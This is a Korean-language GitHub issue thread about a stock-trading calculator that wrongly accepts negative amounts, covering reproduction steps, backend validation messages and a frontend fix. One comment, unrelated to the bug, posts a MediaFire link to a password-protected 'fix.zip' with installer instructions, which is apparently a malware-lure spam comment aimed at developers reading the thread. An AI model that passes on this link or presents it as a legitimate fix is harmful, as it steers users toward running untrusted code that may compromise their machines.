### ISSUE TITLE
[PC-Chrome-1920-스껄 계산기] 스껄 계산기에 음수가 적용되는 문제

### ISSUE THREAD

**Issue by sngbmYu** [100-hours-a-week/5-team-HRTH-ustock-fe#121]
##  버그 설명

- 스껄 계산기에 음수 값을 넣어도 동작하는 문제, 논리적으로 금액이 음수이면 주식을 구매할 수 없기 때문에 입력하지 못하게 해야함

## 재현하는 방법

동작을 재현하는 단계:

1. 종목 상세 페이지로 이동
2. 스껄 계산기에 당시 종목 금액보다 높은 가격의 음수를 입력 (ex. 당시 30000원이었다면, -40000원)
3. 음수를 기준으로 정상적으로 계산이 수행됨

## 예상한 동작

예상했던 일에 대한 명확하고 간결한 설명해주세요.

- 구매하지 못했스껄이 나와야 함
- 백엔드에서 검증 로직 추가 예정 (죄송합니다...)
- 응답 메시지 확인 후 적절한 조치 필요

## 스크린샷 (옵션)

문제를 설명하는 데 도움이 되는 스크린샷을 추가하세요. 스크린샷으로 어렵다면 영상첨부해주세요.

## 데스크톱(다음 정보를 작성해 주세요):

- OS: [예) iOS]
- Browser [예) chrome, safari]
- Version [예) 22]

## 추가적인 내용 (옵션):

여기에 문제에 대한 다른 컨텍스트를 추가해주세요.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sngbmYu** [comment]
만약 응답이 400 Bad Request라면 응답 메시지를 확인해주세요.

응답 메시지는
”종목 정보를 조회할 수 없습니다.” 
또는
”해당 금액으로는 구매할 수 없습니다.”
를 반환합니다.

적절한 Status를 찾지 못해서 메시지로 반환합니다. 만약 다른 Status로 구분하길 원하시면 말씀해주세요.

**Comment by lucy726j** [comment]
status를 사용 안하고 자체적으로 막았습니다.ㅎㅎ
수정 완료
